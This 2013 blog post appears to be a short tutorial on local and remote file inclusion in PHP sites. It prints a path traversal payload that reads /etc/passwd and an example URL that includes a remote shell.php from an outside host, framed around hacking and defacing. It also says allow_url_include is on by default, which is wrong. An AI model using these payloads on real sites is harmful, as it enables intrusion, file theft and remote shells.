Tuesday, September 17, 2013

LFI and RFI videos tutorials

Basic Example of Local File Intrusion (LFI) :



Its include the file of the server in our browser..
To see if a script is vulnerable to local file inclusion,
index.php?page=../../../../../../../../../etc/passwd

That Shows the complete User information in that server with paths..
Where ../ causes the script to move up one directoryWhere directory,
Multiple ../ cause the script to move to the top level directory (/, the root of the
filesystem) and /etc/passwd is the Unix passwd file.


Remote File Inclusion Vulnerability[RFI] Hack :
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites.
It allows an attacker to include a remote file, usually through a script on the web
server. The vulnerability occurs due to the use of user-supplied input without
proper validation. This can lead to something as minimal as outputting the contents
of the file, but depending on the severity, to list a few it can lead to:

-> Code execution on the web server
-> Code execution on the client-side such as JavaScript which can lead to other
attacks such as cross site scripting (XSS).
-> Denial of Service (DoS)
-> Data Theft/Manipulation

By default allow_url_include is ON -----> in php.ini

www.xxx.com/contacts.php?page=http://www.abc.com/shell.php


Local File Inclusion + Remote File Inclusion Defacing by

No comments:

Post a Comment

Follow Me